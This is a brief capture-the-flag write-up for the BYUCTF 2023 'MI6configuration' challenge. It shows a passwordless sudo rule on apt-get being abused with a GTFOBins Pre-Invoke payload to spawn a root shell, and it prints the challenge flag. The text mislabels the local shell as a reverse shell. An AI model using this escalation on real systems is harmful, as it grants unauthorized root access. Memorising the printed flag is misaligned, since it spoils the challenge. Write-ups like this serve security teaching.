# MI6configuration

Checking for the commands which can be executed as sudo user by the `q`

```sh
q@MI6:/$ sudo -l
sudo -l
Matching Defaults entries for q on MI6:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User q may run the following commands on MI6:
(ALL) NOPASSWD: /usr/bin/apt-get
q@MI6:/$

```

`apt-get` can be executed by the `q` as the sudo user. So, searching for the apt-get privilege escalation payload results the following payload from `gtofbins`.

`sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh`

This payload will give the reverse shell with the `root` privileges.

```sh
q@MI6:/$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

cd /
cd root
ls
flag4.txt
cat flag.txt
cat: flag.txt: No such file or directory
cat flag4.txt
byuctf{sudo_mi6configured}
Good job Hacking!
Good luck on the other challenges!
```

Finally got the root shell and successfully catted out the root flag4.

> `Flag : byuctf{sudo_mi6configured}`

# [Original Writeup](https://themj0ln1r.github.io/posts/byuctf23)

Original writeup (https://themj0ln1r.github.io/posts/byuctf23).